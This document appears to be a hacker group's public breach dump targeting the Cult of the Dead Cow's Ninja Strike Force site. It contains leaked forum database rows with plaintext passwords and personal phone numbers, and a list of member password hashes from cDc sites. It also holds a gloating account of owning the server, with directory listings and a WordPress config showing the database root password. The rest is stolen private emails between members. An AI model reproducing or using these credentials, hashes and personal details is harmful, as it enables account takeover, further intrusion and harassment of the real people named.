-(4142,'00243d938a','[quote:00243d938a=\"GreenDiamond\"]Been noticing the amount
-of registered users climbing up, about three-hundred within the past few days.
-They\'re probably really bumming some SEO off of
-cultdeadcow.[/quote:00243d938a]\r\n\r\nIndeed. I need to go through and delete
-these fuckers. I do that about once per week, fun!'),
-(2189,'b3bf87a14b','Actually, in all seriousness, I did have to fuck a cow. A
-dead cow. It made me kind of nervous and sort of smelled bad, but it was pretty
-hot, and I don\'t think that the cow minded much. It\'s really hard once
-rigermortis sets in, because it is just not as flexible.'),
-(2670,'7632aa9253','Hey man just use my password for the moment, I\'m too lazy
-to figure out why ur ftp account doesn\'t work:\r\n\r\nusername:
-hardwire\r\npassword: Emp1repr0duX\r\n\r\ndon\'t uh, delete anything or i\'ll
-have to like... re-upload it. :)\r\n\r\nIf you need to make a SQL database the
-control panel is at:\r\n\r\nuse the same
-(347,'f139ce7d58','Dildog,\r\n\r\nHeads up. Kevin directed me to you. I am
-working on the next version of Torpark and the release of the new Torhawk. I
-want to give back to cDc/Hackmo/NSF because I am about to monetize the
-situation. This has become a trademarking issue. I want the cDc stamp of
-approval, so I need someone to review it. Either to review the source code,
-anon network, or both. And that means I need a dildog up in my ports. Ratte
-suggested you were the man for the job. And if you weren\'t man enough, you
-could suggest someone who was. And of course, this would mean some sort of fee
-or percentage of net profits.\r\n\r\nLet\'s rap.\r\n\r\nemail to, or call me at +1.469.831.6648, but tell me the phone
-number you will cal from or hack the caller ID to say &quot;1337&quot; and I
-will directly pickup.\r\n\r\nSteve'),
-(5146,'7b39b848db','thanks, snookums. your awesomeness is matched only by your
-virility. In return, I give you the password to transend\'s
-email:\r\n\r\\r\nsinjin\r\n\r\nluv &lt;3'),
-(4369,'a3a07bfce2','Dear Mr. Tesla,\r\n\r\nI\'m glad that you got the word on
-the t-file, but have you seen the entire message that G\'Ratte sent me on this?
-\r\n\r\nSign onto:\r\n\r\n\r\n\r\nyour user name is:
-tesla\r\nyour password is: ju6Ha4RA\r\n\r\nyrs. trly.,
-\r\ntrammel\r\ncDc-NSF\r\nOffice of Special Circumstances'),
-(1172,'a8a8bee0c7','I dont want to post links in your topic as it takes away
-from your deal, but if you ever need full videos, pictures, celebe sex crap and
-so on you could always use...\r\n\r\\r\nusername:\r\npassword: shutyoureyes\r\n\r\njust thought I would share
-if you eventually find yourself in the need for more
-material.\r\n\r\nunfortianatly nothing tooo disturbing besides a little bit of
-midget porn and women wearing pig snouts rolling in the mud/getting it on with
-redneck looking actors *shrugs*.'),
-(1972,'00c465f4dc','[quote:00c465f4dc]I will probably never get a MySpace
-account[/quote:00c465f4dc]\r\n\r\nyou can have this one i just got for you
-:)\r\ni believe you can just change the mail addy and password and thats you
-sorted. \r\n\r\nIts totally blank and i have entered no personal stuffs on
-it.\r\n\r\nLogin: \r\\r\n\r\nPassword:
-Pr$raTrUde8r?YEpUjubrAVAjuq-Ph-brUCHAthuyevazus-ajESpequ$eD2$res\r\n\r\nlet me
-know if your taking it or not so i can delete it, if its not needed :P\r\n\r\n
-(5189,'939ca5f807','oxy do you think you could fix my forums? something
-happened this morning I think someone purposely crashed it. I dont know much
-about forums the install and stuff but my whole site is crashed and I didnt
-change anything. If you get a chance can you take a look at it? \r\nthe hosting
-site is \r\nthe login is \r\\r\npassword is
-\r\nlupo5105539792 \r\nI would really apprieciate it. I am gonna be out working
-all day but if you can or you see a problem you can call me at 510-409-5805
-\r\nI hope you can help \r\nLupo'),
-(2417,'b53d2e7dec','Heres my old account,\r\n\r\nI took the liberty of
-resetting the password, do with it what you want.\r\n\r\nUSER:
-Expl0iter\r\nPASS: 9ggbsqud8qp'),
-(4896,'3d46021522','Hello HackerJacks,\r\n\r\nhere\'s a mail-address along
-with the password for the NSF myspace
-account.\r\n\r\\r\n\r\nzvud39eq\r\n\r\nGo ahead and
-experiment... when you have the time and when you\'re feelin\' creative.
-\r\n\r\n(I believe that Trammel, you and me are enough of people to mix with it
-- we can continue to post new ideas and changes in the NSF forum, so we\'re all
-open and directly open for eventual feedbacks)\r\n\r\n\r\nPrison System');
-(777,'a92b1f454b','Your User ID is: 24871\r\nYour Nickname is:
-anonymous1985\r\nYour Password is: ySI@9#aUuL\r\nComments:\r\nAccount\'s
-expirationdate: Lifetime\r\n\r\nyou can download some ebooks (Directory) from
-there!\r\n\r\nc ya'),
-\r\nusername: cdc\r\npassword: bowtothecow
-This is our first batch of hashes from CDC sites. Overall we have hundreds
-cracked, many from this batch.
-Myles Long:041b04c50d21dd5b395bf6c0cf14021c
-THE NIGHTSTALKER:c2cea03312c672df706b17a73776e7ec
-Zodiac Lung:6e14abde32362461479b6eb142c1ac8c
-Deth Veggie:e2a74f8237efa357701566ef7df3847c
-G.A. Ellsworth:99c578e2573657a1c1199277a88ebbdb
-Comrade Smack:566878e0be809a762ba96ae555669237
-tenko 2.0:fa4861da7f8dd99fa6684f71d1e8fcb3
-Lizzie Borden:3b8ec70648c7c65c4706ed15ed3a9764
-Razor Sun:a9137015501a9d3126a6da851fa641cc
-Smoking Samurai:b7ccd6ef2722c6651d054e39b936c100
-cracking man:250c4a1ad1f0eb6851bbbde570446c57
-Alien FX Fiend™:ef166a234ab2355ed86941beb11052c2
-Bucephalus Bill:ac710609337b35b6f8bb316cb8cee699
-TERMINAL ILLNESS:213fbf04308243bbf926fddce394bb31
-Black Hawk:7b28355ee66f6104410879b8c1c4c579
-desert disciple:a6918cbdec446566822f4dd52846b3c2
-Dr. Obscure:5213097ccbffbfd3dd262860a3c15afc
-Knob Macabre:ad198a36c4a282982870e3e2e65ae3c6
-Murder Mouse:11fc8dce5f80a336286eb6742b52607a
-The Fat Controller:3501e91721f4d44c1fba1d450cd96e9b
-Oliver Johnson:9119cd2303a26ca2ceb0a20e3baf5444
-Dark by Design:2a167bd2ada0d057f1ce8c80354cec36
-Prison System:97e680069d0f40d03c2413d74d86c26e
-cobra commander:90eb5a154fdce42cf9156e91a1ac0ca7
-Tuff McQueen:6b8dc2fc513873cece34e2b206f7c2be
-Robert London White:ec09439c9e2d0096328122976c36f34e
-Max Payne:9d8d214774072d4f898e2c1dfbd83e06
-Miss V:57918bd0392843f81e8c8b9a5bb5bd6c
-Albino Rhino:83b3dca6eb79a6e76f5b0be342394269
-terminal bliss:5ef64bad8f9d7e0c85f821580e4d6629
-Electric Synapse:06d6984ec68cc222f1cc2889027e07bf
-The disciple:a3e2a6cbf4437e50816a60a64375490e
-Forex Autopilot:ad39f31800eb1f80893e97de59f9cf9d
-Ãàç Ìÿññ:2070575d7b50aead682cb4fd3296d363
-Online Forex Trading:ad39f31800eb1f80893e97de59f9cf9d
-ñòóäèÿ ðàçðàáîòêè ñàéòîâ:22d45e839622e3f274eb9967639d0e34
-Expemelve, 6, 10]:bb73cc1bdf2d625cccd110a4a55c3802
-ID 1792351271490:4b28268c60712474ece8cbb1b35963ad
-am cheap link
-hanse jumi:927b812982ff876497f1687e9c7b3982
-Area 51:5f4dcc3b5aa765d61d8327deb882cf99
-Alex Sheredan:5864396db6a69353aebcee625715c569
-CDC blog hashes
-G. Ratte:CFfFcLcUZle/k
-Tarkin Darklighter:xzPKiWz8QTXvk
-Count Zero:1X/noJiJmuDo.
-Hella Kitty:j8jv.kfrcfeFA
-Reid Fleming:DtDcPtq5zQm2Q
-Oxblood Ruffin:1LdqfLrPwVX7A
-Krass Katt:VCF440Kz/QesY
-Dark Sorcerer:pEe5gI/W2furI
-Myles Long:t3Ky34tLMlSwA
-Dil Dog:gKrFNEzeE81TE
-cDc communications:aAwVhjTDJY94Y
-Deth Vegetable:z3/lohkRD4iSM
-Obscure Images:B9Ayyw7aM2N9g
-Carrie Carolin:T0/tbH3MtuTaA
-Tweety Fish:kxxDeVzQ7xG4g
-Drunk Fux:mYohCcCA49feo
-White Knight:uPDxxVSZ5XyaI
-G.A. Ellsworth:wmnAbTjll5SCs
-Lord Digital:F8kuHzTTuIguc
-Sir Dystic:6nfgVLh7RH59.
-Franken Gibe:NuvW9JdLi.dFs
-Tequila Willy:IBxlxRuzhqAGg
- .-. _ _ .-.
- / \ .-. ((___)) .-. / \
- /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \
--/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
-/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\
- \ / `-' (U) `-' \ /
- `-' `-'
-Ninja Strike Force
-Wow, with a name like that you'd be forgiven for thinking that it is a ELEET
-special operations team; members consisting of people with the same skill level
-as a Bruce Lee / Schwarzenegger love child. They are, in their terms, the "mighty
- and the chosen". It's the Cult of the Dead Cow's most eleet of eleet! the cream
-of the crop! the best collection of _hackers_ that they have collected.
-"Membership in the NSF is granted by the cDc to those individuals who stand out
-in their support of the cDc and its ideals. Members are recognized for their
-abilities, capabilities, and being the best of the best in their skills."
-We don't really need to rag on them, they admit that this sorry team of
-self-obsessed bloggers is the best they have.
-As you look a little deeper though, you figure out it's hosted by Flack. Now
-Flack is an all-around nice guy, he can't tell a lie, he has no scene ego and
-he isn't a hacker (he even admitted on their secret forum that his box is
-"probably" ownable). So why the hell would you host your stupid site on his
-webserver, relying on him to secure your ninja stronghold?
-Anyways we did own them, and here's their shit. Oh, before I forget, it's a
-Windows box, so the hack logs might not be too great. :p
-$ dir C:\
-23.02.2008 12:44 1024 .rnd
-24.02.2008 13:43 <DIR> Apps
-19.03.2006 01:34 0 AUTOEXEC.BAT
-19.03.2006 01:12 208 boot.ini
-19.03.2006 01:34 0 CONFIG.SYS
-18.02.2008 19:22 <DIR> Data
-22.02.2008 23:00 <DIR> Documents and Settings
-25.08.2006 17:36 <DIR> HP
-19.03.2006 01:34 0 IO.SYS
-19.03.2006 01:34 0 MSDOS.SYS
-17.02.2007 08:03 94720 msizap.exe
-26.03.2006 09:26 <DIR> MSOCache
-24.03.2005 19:42 47772 NTDETECT.COM
-12.07.2007 16:04 297072 ntldr
-03.01.2008 20:44 <DIR> Path
-17.03.2008 15:04 <DIR> Perl
-19.03.2008 14:11 <DIR> Program Files
-07.11.2007 18:49 <DIR> RECYCLER
-19.03.2006 01:40 <DIR> System Volume Information
-09.04.2008 13:48 <DIR> Temp
-23.01.2008 16:29 <DIR> Temp_Console
-15.08.2006 22:42 5048 TMHotFix.log
-04.01.2008 14:46 160876 TMPatch.log
-09.01.2008 19:40 <DIR> Video
-29.08.2006 21:40 <DIR> ViewSonic
-14.04.2008 21:06 <DIR> WINDOWS
-27.12.2007 16:21 0 wizard.txt
-19.03.2006 01:35 <DIR> wmpub
-19.03.2008 13:47 <DIR> WWW
-$ dir C:\WWW
-20.03.2006 21:39 <DIR> consoles
-15.11.2007 11:03 55 index.php
-19.03.2008 15:09 <DIR> logs
-20.03.2006 21:38 <DIR> ohara
-20.03.2006 21:38 <DIR> programming
-15.04.2007 18:03 <DIR> search
-20.03.2006 21:35 <DIR> starwars
-03.01.2008 20:19 <DIR> surfstats
-20.03.2006 21:35 <DIR> tbh405
-28.03.2008 19:36 <DIR> temp
-26.01.2008 16:08 <DIR> Webmail
-24.04.2008 17:58 <DIR> webmarks
-09.01.2008 08:19 <DIR>
-14.02.2008 12:40 <DIR>
-04.01.2008 14:39 <DIR>
-04.03.2008 16:47 <DIR>
-17.04.2008 10:29 <DIR>
-09.11.2007 09:04 <DIR>
-24.04.2008 17:54 <DIR>
-07.11.2007 20:38 <DIR>
-07.11.2007 20:38 <DIR>
-20.03.2006 21:30 <DIR> yukon
-$ dir C:\WWW\
-16.11.2007 18:12 3262 favicon.ico
-19.11.2006 06:56 94 index.php
-02.03.2008 20:34 15407 license.txt
-29.02.2008 16:09 7638 readme.html
-21.01.2008 15:18 <DIR> temp
-09.04.2008 13:50 <DIR> wp-admin
-17.03.2008 21:18 32776 wp-app.php
-03.08.2007 00:45 129 wp-atom.php
-21.02.2008 22:55 1026 wp-blog-header.php
-04.02.2008 19:27 2919 wp-comments-post.php
-03.08.2007 00:45 153 wp-commentsrss2.php
-24.12.2007 05:34 1288 wp-config-sample.php
-07.11.2007 20:31 947 wp-config.php
-07.11.2007 20:35 <DIR> wp-content
-03.08.2007 00:45 851 wp-cron.php
-19.11.2006 06:56 120 wp-feed.php
-26.04.2008 23:33 <DIR> wp-includes
-03.11.2007 16:09 1529 wp-links-opml.php
-26.03.2008 07:43 16383 wp-login.php
-29.12.2007 18:38 6077 wp-mail.php
-18.09.2007 22:23 296 wp-pass.php
-03.08.2007 00:45 190 wp-rdf.php
-11.10.2006 09:26 251 wp-register.php
-03.08.2007 00:45 127 wp-rss.php
-03.08.2007 00:45 129 wp-rss2.php
-11.03.2008 08:45 14292 wp-settings.php
-28.03.2008 06:51 3123 wp-trackback.php
-14.03.2008 19:08 68155 xmlrpc.php
-$ type wp-config.php
-// ** MySQL settings ** //
-define('DB_NAME', 'oharawordpress'); // The name of the database
-define('DB_USER', 'root'); // Your MySQL username
-define('DB_PASSWORD', 'p@ssw0rd'); // ...and password ## :(
-define('DB_HOST', 'localhost'); // 99% chance you won't need to change
-this value
-define('DB_CHARSET', 'utf8');
-define('DB_COLLATE', '');
-// You can have multiple installations in one database if you give each a
-unique prefix
-$table_prefix = 'nsf_'; // Only numbers, letters, and underscores
-// Change this to localize WordPress. A corresponding MO file for the
-// chosen language must be installed to wp-content/languages.
-// For example, install to wp-content/languages and set WPLANG to
-// to enable German language support.
-define ('WPLANG', '');
-/* That's all, stop editing! Happy blogging. */
-define('ABSPATH', dirname(__FILE__).'/');
-As you can see, there isn't much here apart from a WP and his hardcoded
-websites and blogs. Typical.
-We did manage to grab some oldschool mail spools for you though, so you can get
-a feel for the day-to-day operations of cdc. This mostly involves talk of
-secret handshakes, what to name applications, circle jerks....
-Received: from ([]) by
- (InterMail vM. 201-2131-130-101-20060113) with ESMTP id
-for ; Wed, 16 Aug 2006 08:03:23 -0400
-Received: from phoenix.wks.ciphire.local ([]) by with IMP id Abyo1V01F5MdQFM0000000 Wed, 16 Aug 2006
-07:58:50 -0400
-Received: from phoenix.wks.ciphire.local (localhost []) by
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-Date: Wed, 16 Aug 2006 14:01:46 +0200
-From: "Mixter"
-X-Priority: 3
-X-MSMail-Priority: Normal
-Subject: Re: scr00gle?
-Message-ID: <20060816140146.0893b707@phoenix.wks.ciphire.local>
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-Hi, and sorry for taking so long.
-Hmmm. I'm afraid I can't say much about scr00gle, as I'm on Linux
-and my vmware is broken atm (should be fixed these days though),
-and also I couldn't find the SOURCE of this anywhere, it contained
-just docs and an .exe. Are you aware of where to find the source of
-this app, or would the author cooperate with us? As we'd obviously
-need it anyhow :) Plus, cross-platform app capability might be cool, too.
-On Mon, 14 Aug 2006 8:20:12 -0500
- wrote:
-> Mixter, I was wondering if you had had an opportunity to check out scr00gle
-1.01 yet, and if that was along the lines of what you were thinking for your
-> The name scr00gle is already taken, but until I/we/whoever can come up with
-another one, I've kept it as the working name.
-> Rob / Flack, cDc-NSF
-> PS: Thread in progress here:
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-Date: Sat, 6 May 2006 18:01:38 -0500
-X-Priority: 3
-From: "Myles Long"
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-Subject: Re: 405 -- Needs Proofing
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-i thought it was really good. even though it's about 405, it relates
-quite a bit to 806 (and many other area codes, i'm sure). good work,
-On 5/6/06, wrote:
-> Oh wow, awesome. It's not entirely the article I wanted to write but I th=
-> it serves its purpose. I don't know if you can ever completely relate the
-> nostalgic feelings of "those days" to people who weren't there, but I tri=
-> Rob
-> ----- Original Message -----
-> From: "Myles Long"
-> To:
-> Sent: Saturday, May 06, 2006 2:29 PM
-> Subject: Re: 405 -- Needs Proofing
-> good work, man. sorry for the lack of a response. i just posted it
-> to the site, after having made only minor changes (i think there were
-> one or two typos; that's about it).
-> thanks for writing this. aww yeah.
-> word.
-> -steev
-> On 4/24/06, wrote:
-> >
-> > Hello Myles Long,
-> >
-> > The following is an email sent to you by Flack via your account on s00p=
-> > s3krut cDc/NSF/Hacktivismo forum. If this message is spam, contains
-> > abusive or other comments you find offensive please contact the webmast=
-> > of the board at the following address:
-> >
-> >
-> >
-> > Include this full email (particularly the headers). Please note that th=
-> > reply address to this email has been set to that of Flack.
-> >
-> > Message sent to you follows
-> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~
-> >
-> > Take a gander and see what you think. This has probably been the hardes=
-> > file I've ever written for a couple of reasons, so if a couple of parts
-> > feel forced, that's why. I could use some editing help on this. I know =
-> > holding up the works at this point. Read over it and tell me what you
-> > think; any advice at this point is appreciated.
-> >
-> > Once I've got this under my belt, the next project is getting
-> > batch-o-matic ready for release.
-> >
-> > --- BOF ---
-> >
-> > There's a feeling of nostalgia I get every time I drive past my old
-> > neighborhood, which isn't far from where I live today. Back when I was =
-> > kid my neighborhood was my entire world. My stomping grounds consisted =
-> > six connected blocks, surrounded by a creek on two sides and highways o=
-> > the other two. From sun up to sun down I was free to roam wherever I
-> > wished as long as I stayed within the boundaries of my neighborhood. To
-> > tell you the truth, I'm not sure going past those boundaries ever even
-> > crossed my mind.
-> >
-> > As you get older, perspectives change. When the kids in the neighborhoo=
-> > (including myself) turned sixteen we got cars, and our worlds were
-> > exponentially expanded. Overnight our old neighborhood went from being =
-> > coolest place we knew to the most boring place on Earth. Before long al=
-> > my friends had graduated from high school and moved away.
-> >
-> > Even though the neighborhood looks different these days, I'll always
-> > treasure my memories, not only of the neighborhood and the people who
-> > lived there but of all the adventures we had together. No matter how ma=
-> > years or miles come between me and that old place, the stories and
-> > adventures those of us who grew up there had together will be with me f=
-> > the rest of my life.
-> >
-> > The same can be said for those of us who grew up behind computer screen=
-> > calling Bulletin Board Systems. Online our neighborhoods were our area
-> > codes, lines drawn in the sand for us by Ma Bell. As long as I stayed
-> > within those virtual boundaries, I was free to call whomever I wanted. =
-> > people I met through BBSes and the adventures we had together were very
-> > real and a very big part of my childhood. In fact there are lots of peo=
-> > I met online 20 years ago that I still talk to today.
-> >
-> > When it comes to the great BBS era, either you were there or you weren'=
-> > If you weren't, well, you missed out on some incredible times. The
-> > comradery between users in a local area code will never be matched thro=
-> > the Internet. Like a gang, those of us from the same area code stuck
-> > together, ready to take on the world.
-> >
-> > My area code was 405.
-> >
-> > 405 wasn't much different than any other area code. It wasn't particula=
-> > special or unique in any way. In fact, there's no real reason why 405
-> > deserves a tribute dedicated to it over your own local scene. Many of t=
-> > stories and ideas that appear here could and probably did apply to your
-> > area code as well. Unfortunately as many of us have discovered over the
-> > years, despite being one of the most exciting electronic eras of our
-> > lives, nobody was taking notes. While there have been attempts at
-> > documenting the overall history of BBSes (Jason Scott's BBS Documentary
-> > comes to mind), many of the local legends and escapades =96 not just fr=
-> > 405 but from every area code =96 have all but been erased from existenc=
-e. As
-> > BBSes were eventually turned off one by one they took their histories w=
-> > them. And more than that, some of my strongest memories from those year=
-> > were things that happened in real life, things that didn't even happen
-> > online. And so, if you'll indulge me for a few lines more, I'd like to
-> > share with you just a few of my memories from my own noggin about my al=
-> > mater =85 405.
-> >
-> > -
-> >
-> > Back when I started modeming, there wasn't much of a "scene". For
-> > starters, everyone was separated by machine type; the Apple users calle=
-> > Apple boards, the Commodore users called Commodore boards, the Atari us=
-> > called Atari boards, the PC people called PC boards, and so on. Within
-> > these groups there were subgroups, the biggest division being between
-> > those who trafficked in warez and those who didn't. At least in the ear=
-> > days it seemed like boards rarely did both =96 you either ran a warez b=
-> > with paltry message areas, or a message board with everything but warez=
-> > Keep in mind that back then, running a warez BBS meant dropping some
-> > serious cash for hardware. Back in the early Commodore days, floppy dri=
-> > cost $200 each. You could run a BBS with just one drive, but all your
-> > system files on one disk didn't leave much room for games. Plus if you
-> > were running in this configuration, people could crash your board simpl=
-> > by upload files until your disk filled up, preventing the BBS software
-> > from writing to disk and locking the whole thing up. To run a serious
-> > warez board you needed multiple floppy drives; running three (one for t=
-> > BBS itself, one for uploads and one for downloads) wasn't unheard of. T=
-> > really serious guys invested in hard drives. In the late 80's, a 10 meg
-> > hard drive for the C64 would set you back over a thousand dollars.
-> >
-> > As a result of all this separation, 405 (and as I mentioned earlier, al=
-> > area codes) ended up with "pockets" of users. Imagine them as the kids =
-> > started kindergarten with and worked your way through elementary school
-> > with them at your side. The same people tended to call the same boards,
-> > and pretty soon small scenes began to develop. But again, these were
-> > mostly divided up by platform (the Commodore scene, the Apple scene, et=
-> > In addition, each platform was likely to have multiple scenes, groups o=
-> > people who never crossed paths.
-> >
-> > I had some great times within both the Apple and Commodore scenes =96 s=
-> > much in fact that I've almost finished my first book on the subject =96=
- but
-> > none of these fractured cells can truly be called the "405 scene". In m=
-> > opinion, that didn't happen until the early 90's. The main catalyst for
-> > this change was the unification of platforms. We all got IBM PCs =96 or
-> > rather, for many of us, our parents did. Businessmen across the country
-> > were buying PC's with hard drives and modems to keep up in the business
-> > world. At night, after those businessmen went to bed, their kids would
-> > turn those same machines back on and begin dialing BBSes.
-> >
-> > -
-> >
-> > As everyone began gravitating toward the IBM platform, all of our world=
-> > began meshing together as well. As more people began calling the same
-> > boards and the pool of people began to grow, cool things began to happe=
-n =96
-> > namely, "like people" began to find each other. As a result, some reall=
-> > cool things began to happen.
-> >
-> > One was the birth of TBH405, or simply The Brotherhood. TBH405 was a gr=
-> > of people who actively promoted the local scene. TBH405 released
-> > scene-related newsletters, ranking local boards and users and keeping
-> > people informed as to the "goings-on" of the inner circle, so to speak.
-> > Think of it as the cool kids from school, if the cool kids from school =
-> > had their own club. The coolest thing about The Brotherhood was its wid=
-> > variety of members and their skills. Sure there were warez hounds, but
-> > there were people who were into hacking, and the art scene, and
-> > programmers, and all kinds of stuff. If you were a member of The
-> > Brotherhood, you were hooked up.
-> >
-> > TBH405 wasn't the only group in town. Soulz at Zero, often referred to =
-> > the first themed lit group, was founded by The Stranger and myself in 4=
-> > A group of five girls known as TDKEB also had some success with their l=
-> > packs which consisted of poetry, stories, girly-gossip and in jokes.
-> > TBH405 even managed to get their public meeting times published in 2600
-> > Magazine for a while.
-> >
-> > Like many other area codes, there was always a select few BBSes that ha=
-> > risen above the local scene and made contact with the outside world.
-> > Boards like Scooter Dome and The Plutonium Project kept the rest of the
-> > 405 scene stocked with the latest games and applications. Even better w=
-> > when Street Spydrs (the Razor 1911 WHQ) temporarily relocated to our ar=
-> > code. Suddenly the scene locals were being drafted into courier positio=
-> > for the megagroup, and local boards were flooded with all the latest
-> > warez.
-> >
-> > Of course my greatest memories of those times weren't about the groups =
-> > the warez or even the boards themselves, but about the people. Since BB=
-> > "scenes" normally consisted of people who lived within the same area co=
-> > it was not uncommon for those people to meet in real life. Sometimes it
-> > was for "business" reasons; back in the early days, due to slow modem
-> > speeds it was often quicker to trade software with someone in person th=
-> > it was to do over the phone lines. There were just as many social event=
-> > as well =96 BBS Parties, as they were referred to. A local Commodore 64
-> > cracking group I was a member of (the OK Krackers) hosted the first BBS
-> > party I ever attended. It was also the first time I ever got drunk. I w=
-> > 14. Imagine mom's surprise when she picked me up the next morning and
-> > found dried puke stuck in my hair and one shoe missing. It was a long
-> > night.
-> >
-> > Over the years I attended dozens of local parties. The Brotherhood had
-> > their own official "Gatherings". There were nine or ten of those, each
-> > wilder than the last. There was the one where Ozzymandias passed out, f=
-> > against a wall and knocked his front tooth out. There was the one where
-> > someone ate pink Hostess snacks and managed to vomit pink puke all over
-> > someone's living room carpet. There was the one where people were doing
-> > shots of Jack Daniels and Pace Picante Sauce. Then there was the Gather=
-> > where Yaun-Ti (the founder of TBH405) got so drunk that he forgot where=
- he
-> > lived, a fact he informed us of after several of us drove him around fo=
-> > hours on end.
-> >
-> > The interpersonal relationships that formed during those times were
-> > unbreakable, or so we thought. I can remember joking with people that
-> > someday our kids might call the same BBSes we called. It seemed like th=
-> > scene would never die =96 and then practically overnight, it did.
-> >
-> > In mid-to-late 1994, several of us discovered the Internet. At least fo=
-> > us this was pre-Web days. The Internet for us consisted of a few FTP si=
-> > and IRC. IRC seemed mind blowing to us at the time. For years we'd been
-> > limited to chatting with one person at a time, and all of a sudden here
-> > you could have hundreds of people talking in the same place.
-> >
-> > What's funny though, looking back, is that everything we saw that you
-> > could do on the Internet we saw as an extension of the BBS world. The
-> > Internet was another place you could get warez for your BBS. Using the
-> > Internet, you could route mail to and from other boards. If your favori=
-> > BBS was busy, you could get on the Internet and chat on IRC until the
-> > board became available. I don't think we ever realized just how quickly
-> > the Internet would squash out little local scene out of existence. But =
-> > did. It killed them all eventually. Some hung on longer than others, bu=
-> > eventually as speeds increased and the web blossomed it became evident =
-> > even the oldest of the old schoolers that there was no stopping the
-> > behemoth.
-> >
-> > Soon, nobody cared what area code you were from because it didn't matte=
-> > In that sense the Internet was the great equalizer. Nobody knew your
-> > history and nobody cared about your little local groups. The Internet w=
-> > global, baby.
-> >
-> > Just like the old neighborhood, I'm still wistful about those old days.=
- I
-> > try and keep touch with as many of the old group as possible. Anacodia
-> > married Tekin and moved to California. False God got on with Dell and
-> > lives in Austin. Gatoperro moved to Texas and is now in California, I
-> > think. Prong moved to Florida. My buddy Arcane lives outside of Dallas.
-> > There are a few of us still left in 405. Violetta Kitten moved out of
-> > state and came back. Leperkhan still lives here; his kid's in junior hi=
-> > now I think. The Stranger's an elementary schoolteacher somewhere aroun=
-> > these parts. Black Sunshine's got 14 degrees or something in psychology
-> > and sociology and working on her doctorate. Rivas works for a major
-> > aeronautical company. I work for a different one. It gets harder and
-> > harder to keep track of people. Some you can still catch on IRC. Some h=
-> > blogs. Some I get an e-mail from a couple of times a year. Some
-> > disappeared completely.
-> >
-> > At least one died; Ghost in the Machine passed away several years ago. =
-> > was a strange way to reunite the old gang one last time. In one small,
-> > dingy church sat most of the major players from the old 405 scene. Look=
-> > around the room I saw people I'd cracked password files with, people I'=
-> > hacked ISP accounts with, people I'd gone to concerts with, people I'd
-> > drank too much and passed out with, all sitting around wearing ties,
-> > trying to look at least semi-respectable. That was the last time I saw
-> > most of the old crew; at a funeral, of all places.
-> >
-> > -
-> >
-> > This past weekend, my old neighborhood had their annual garage sale
-> > weekend. It's weird going back there a generation later, as so much stu=
-> > has changed. The old creek I used to play army in was paved long ago an=
-> > surrounded by a chain-link fence shortly after. The field I used to pla=
-> > football in has a house on it. Our old dirt bike track is now home to a=
-> > official softball field. There are other parts of the neighborhood that
-> > still look the same. The willow tree under the streetlight across the
-> > street from my old house is still there. The view out my father's bay
-> > window looks the same as it did 20 years ago.
-> >
-> > The old BBS landscape, however, is gone forever. The disks have been
-> > thrown away, or were formatted, or simply rotted over time. In my garag=
-e I
-> > have 3-ring-binders full of old printed out user lists and text files, =
-> > ink of which has faded over the years. I hang on to old spiral notebook=
-> > filled with names, passwords and phone numbers, but the more time goes =
-> > the less familiar the notes look. I recognize the handwriting as my own=
-> > but the meaning behind some of the notes gets more cryptic each year.
-> >
-> > Even some of the stories have begun to fade from my human brain. "Remem=
-> > when we =85" someone's story will start, and I'll think to myself =85 "=
-no, I
-> > don't." Maybe it'll sound familiar, maybe it won't. With no written
-> > documentation, I find that many of the stories are different depending =
-> > who's telling them.
-> >
-> > Rose-colored glasses or not, I'll always think back to the old BBS days=
- as
-> > some of the greatest times of my life. The files, the games, the disks,
-> > the accounts, even the boards themselves are all gone, but the memories=
-> > the adventures, the fun times =85 they'll always be with me.
-> >
-> > Here's to ya, 405.
-> >
-> > --- EOF ---
-> >
-> > Rob
-> >
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-Date: Wed, 25 Jan 2006 17:16:48 -0800 (PST)
-From: "Grandmaster Ratte'"
-Subject: Re: cdc-nsf site - beta online
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-Looks really good - totally dig the graphics and colors and ninja themed
-stuff. Quick work, too!
-Sorry, I've had my head down this week buried in trading stuff - difficulties
-have arisen. Myles can do adminy stuff better & faster than I can if you
-need any of that. Me, I just got opinions (ha).
-Anyway, looking forward to the other guys taking a gander at it. I'm sure
-they'll be stoked. This a great example of what I'm the most happy to see
-with NSF stuff - someone sensing a need and just filling it w/out a whole lot
-of committee chatter and whatnot. Awesome.
---- wrote:
-> Still working on some (a lot) of the graphics and features. Random pic
-> directory is now working. Setting up different bloggers is simple.
-> After fighting with my isp I got them to add another db for free so I moved
-> all the hosting and db back to my site for now.
-> Any input, etc, always appreciated. Once I tweak for another day or two
-> I'll post it up in the cDc forum for input.
-> Rob
-Received: from ([]) by (InterMail vM.
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-Date: Thu, 3 Aug 2006 11:21:49 -0500
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-From: "Myles Long"
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-> What's the best way to title my app for cDc?
-That's a really good question...
-> Right now in the title bar I have: "batch-0-matic 1.0 - (c) 2006
-That looks good to me. Including "cDc" is key, and including NSF
-works, too; it'll help differentiate the NSF from the CULT, but make
-it clear that it's still part of the overall cDc (because cDc <> CULT,
-though that's the confusion).
-> Would it be preferrable to remove my name, drop the NSF, etc? Doesn't matter
-to me,
-> just looking for the standard (?). Also, speaking of standards, any preferred
-format for
-> documentation? In the past I've always done HTML but I could do plain txt or
-> else (?).
-As far as I know, there aren't standards for this stuff, though there
-probably should be. Maybe not put the copyright info in the titlebar?
- Maybe in an about screen or on a splash screen? I dunno, either way
-is cool. We should establish some sort of uniformity to branding
-cDc-related apps; since I'm lazy, I'll just declare that whatever you
-do is the de facto standard. Heh.
-> A week or so ago Kevin sent out an e-mail requesting someone code a Google
-> Hacking/Query app. I plan on having a proof of concept done by the end of
-this weekend.
-That's something that Mixter was working on/was going to work on; I
-don't know the details about what all, if anything, he's done besides
-conceptualize. That's not to say that you shouldn't work on it; in
-fact, you definitely should. Proof of concept is a key point in
-moving this forward, and this could be huge if we play it right. I've
-found, as I think you and I have discussed before, that lots of
-cDc-related people are big on ideas and small on follow-through. So,
-yeah, go for it, then we can either fold it and Mixter's deal together
-or we can call for help on yours or whatever. Long story short, great
-idea, can't wait to see it.
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-Date: Sun, 20 Aug 2006 18:24:19 -0500
-From: "Myles Long"
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-Subject: Re: youtube
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-Sorry for the delayed reply, I'm really quite a slow ass. I hope my
-recent pimping of your book will help make up for my slowness. Check
-this out:
